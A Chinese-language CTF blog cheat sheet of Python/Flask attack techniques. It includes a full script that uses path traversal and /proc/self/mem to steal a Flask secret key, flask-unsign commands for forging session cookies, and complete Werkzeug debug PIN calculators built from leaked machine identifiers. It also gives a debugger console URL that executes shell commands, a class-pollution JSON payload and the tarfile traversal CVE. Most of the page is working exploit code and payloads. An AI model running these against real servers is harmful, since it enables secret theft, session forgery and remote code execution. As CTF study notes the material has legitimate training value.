python绕过

2020-11-14 web python, 绕过 ∞ 评论

绕过

常见绕过

os.path.join()

如果一个参数是以/符号开头的，就将这个参数作为开头继续向后拼接。

os.path.join('uploads/', '/flag') => '/flag'

render_template()

模板渲染，缓存机制：首先会检查是否有缓存，如果缓存可用就使用缓存，缓存不可用就加载模板。

Cache_size 默认是 400，使用 LRUCache，默认将最常用的页面缓存起来，便于之后的使用，每次访问页面都会将这个页面放到cache的最前方，同时，处于cache后方的页面，由于长期得不到访问，在超过cache规定的最大限制之后，将会被移除出缓存中。

SSTI

见SSTI。

session伪造

在Flask中，session是保存在Cookie中，也就是本地，所以可以直接读取其内容，也就产生了Flask伪造session的漏洞。

secret key

python存储对象的位置在堆上。

app是实例化的Flask对象，而secret key在 app.config['SECRET_KEY']，可以通过读取 /proc/self/mem 来读取secret key。

读取堆栈分布

由于 /proc/self/mem 内容较多而且存在不可读写部分，直接读取会导致程序崩溃，所以先读取 /proc/self/maps 获取堆栈分布。

map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
    map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
    if map_addr:
        start = int(map_addr.group(1), 16)
        end = int(map_addr.group(2), 16)
        print("Found rw addr:", start, "-", end)

读取对应位置内存数据

然后读取 /proc/self/mem，读取对应位置的内存数据，再使用正则表达式查找内容。

res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
if "*abcdefgh" in res.text:
   secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
      if secret_key:
    print("Secret Key:", secret_key[0])

完整利用

import requests
import re

url = 'http://url:10001'
bypass = '../../../../../../../../../..'

rw = []

map_list = requests.get(f"{url}/read?filename={bypass}/proc/self/maps")
map_list = map_list.text.split("\n")
for i in map_list:
    map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
    if map_addr:
        start = int(map_addr.group(1), 16)
        end = int(map_addr.group(2), 16)
        print("Found rw addr:", start, "-", end)
        rw.append((start,end))

for k in rw:
    res = requests.get(f"{url}/read?filename={bypass}/proc/self/mem&start={k[0]}&end={k[1]}")
    if "SECRET" in res.text:
        try:
            secret_key = re.findall("[A-Za-z0-9+/=]{40}SECRET", res.text)
            if secret_key:
                print(secret_key[0])
        except:
            pass

工具

flask-unsign

加密：

flask-unsign --sign --cookie "<Session CookieValue>" --secret '<Secretkey>'

解密：

flask-unsign --decode --cookie '<SessionCookieStructure>'

爆破key：

flask-unsign --unsign --cookie '<SessionCookieStructure>'

flask-session-cookie-manager

加密：

flask_session_cookie_manager{2,3}.py encode [-h] -s <SecretKey> -t <SessionCookieStructure>

解密：

flask_session_cookie_manager.py decode [-h] [-s <Secretkey>] -c <Session CookieValue>

解密脚本

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

参考
客户端 session 导致的安全问题

Flask debug PIN

PIN码是Flask在开启debug模式下，进行代码调试模式的进入密码，需要正确的PIN码才能进入调试模式。

计算逻辑位于 python3.x/site-packages/werkzeug/debug/__init__.py#get_pin_and_cookie_name，版本不同的区别在于3.6与3.8的md5加密和sha1加密不同。

PIN生成要素

username
用户名。通过 getpass.getuser() 读取，通过文件读取 /etc/passwd。
modname
模块名。通过 getattr(mod,"file",None) 读取，默认值为 flask.app。
appname
应用名。通过 getattr(app,"name",type(app).name) 读取，默认值为 Flask。
moddir
Flask库下 app.py 的绝对路径。通过 getattr(mod,"file",None) 读取，实际应用中通过报错读取。
uuidnode
当前网络的mac地址的十进制数。通过 uuid.getnode() 读取，通过文件 /sys/class/net/eth0/address 得到16进制结果，转化为10进制进行计算。
machine_id
docker机器id。每一个机器都会有自已唯一的id，linux的id一般存放在 /etc/machine-id 或 /proc/sys/kernel/random/boot_id，docker靶机则读取 /proc/self/cgroup 或 /proc/self/mountinfo，其中第一行的 /docker/ 字符串后面的内容作为机器的id，在docker环境下读取后两个，非docker环境三个都需要读取。
首先访问/etc/machine-id，有值就break，没值就访问/proc/sys/kernel/random/boot_id，然后不管此时有没有值，再访问/proc/self/cgroup其中的值拼接到前面的值后面。

PIN生成脚本

# <3.8 MD5
import hashlib
import time
from itertools import chain
probably_public_bits = [
     'flaskweb'# username, /etc/passwd
     'flask.app',# modname, 默认值
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')), 默认值
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None), baox
]

private_bits = [
     str(int('02:42:ac:1e:00:02'.replace(':',''),16)),# str(uuid.getnode()),   /sys/class/net/eth0/address, /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

def hash_pin(pin: str) -> str:
    return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]

print(rv)
print(cookie_name + "=" + f"{int(time.time())}|{hash_pin(rv)}")

# >=3.8 sha1
import hashlib
import time
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    str(int('02:42:ac:1e:00:02'.replace(':',''),16)),# str(uuid.getnode()),   /sys/class/net/eth0/address, /sys/class/net/ens33/address 16进制转10进制
    #machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '5dcbb59326564e8ea4e99a0afb803c47'+ # /etc/machine-id 
	'5dcbb593-2656-4e8e-a4e9-9a0afb803c47'+ # /proc/sys/kernel/random/boot_id
	'0::/'.strip().rpartition("/")[2] #  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

def hash_pin(pin: str) -> str:
    return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]

print(rv)
print(cookie_name + "=" + f"{int(time.time())}|{hash_pin(rv)}")

URL

frm如果没有报错信息的话值为0
s的值可以直接访问./console，然后查看源码的SECRET值

1
2
3

http://x.x.x.x/console?&__debugger__=yes&cmd=__import__("os").popen("id").read()&frm=0&s=[s_value]

Cookie: [Cookie]

参考：

ctfshow - web 801

GYCTF 2020 - FlaskApp

*CTF - oh-my-notepro

原型链污染

就像Javascript中的原型链污染一样，这种攻击方式可以在Python中实现对类属性值的污染。需要注意的是，由于Python中的安全设定和部分特殊属性类型限定，并不是所有的类其所有的属性都是可以被污染的，不过可以肯定的，污染只对类的属性起作用，对于类方法是无效的。

示例：{"username":"1","password":"1","__init__":{"__globals__":{"__file__":"/proc/self/cgroup"}}}

参考：

Python原型链污染变体(prototype-pollution-in-python)

2023DASCTF&0X401七月赛 - EzFlask

其他

tarfile模块

CVE-2007-4559

该漏洞影响到Python的tarfile模块，可造成系统文件的任意读取和写入。CVE-2007-4559的基本原理与CVE-2001-1267类似，当使用tar打包一个包含 ../../../../../etc/passwd，并用管理员权限解包时，/etc/passwd 文件会被覆盖，同理使用文件链接也可以产生同样的效果。

Lazzaro

CTF弱鸡自进阶